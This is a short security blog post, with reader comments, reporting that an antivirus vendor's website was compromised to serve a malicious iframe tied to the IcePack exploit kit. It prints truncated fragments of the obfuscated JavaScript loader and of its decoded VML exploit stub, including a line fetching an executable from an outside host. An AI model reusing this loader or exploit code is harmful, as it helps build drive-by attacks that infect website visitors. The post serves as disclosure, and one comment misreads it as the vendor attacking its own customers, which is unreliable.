Antivirus company website is infected!!!

UPDATE(08/02): Malicious IFRAME has been removed . So Web-admins  should have knowledge of all various method of attacks  and keep update & audit their site/server.

What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. 
The same happened to Delhi (India) based  AVsoft Technologies’s antivirus website http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable to detect malwares!

Infection is carried by exploiting common vulnerabilites using encrypted script. In this case it is like

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc(“gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….

which decryptes to

<html xmlns:v=”urn:schemas-microsoft-com:vml”><head>
<object id=”VMLRender” classid=”CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E”>
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id=”myDivA”></div> 
<script language=”JavaScript”>  
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….

function Attack(n)
 {…
‘<param name=”src” value=” http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…

4.jpg

3.jpg

2.jpg

This all is used by the infamous (underground networks!!) tool “IcePack” . You can see below the admin console

1.jpg

Already reported to concerned authorities.

Advertisements

8 Responses to “Antivirus company website is infected!!!”

  1. Empresa de antivirus infecta a sus propios clientes (ENG)

    Empresa india que comercializa el antivirus SmartCop Antivirus, lo capa para que no detecte malware y hace uso de una vulnerabilidad para usar un script encriptado para colarles a sus clientes el soft IcePack, que es una herramienta para instalar malwa…

  2. Hay otros las porciones de la herramienta que hacen las mismas cosas como MPack, FirePack, la necesidad de WebAttackers..The es haber puesto al día softwares y asegurar el código que programa de modo que ninguna inyección de la IRF o del código

  3. […] Sarah wrote an interesting post today onHere’s a quick excerptWhat do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. The same happened to Delhi (India) based … […]

  4. […] What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website.
    The same happened to Delhi (India) based AVsoft Technologies’s antivirus […]

  5. I must say, I could not agree with you in 100%, but its just my opinion, which indeed could be wrong.
    p.s. You have a very good template . Where did you find it?

  6. That’s an interesting article. I just wondered if you could tell me where to find more info on this topic ?

  7. Really nice post. Very Informative and helpful post.

  8. Thank you. Awesome submissions you have here. Got some extra sites to direct to which have a bit more info?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: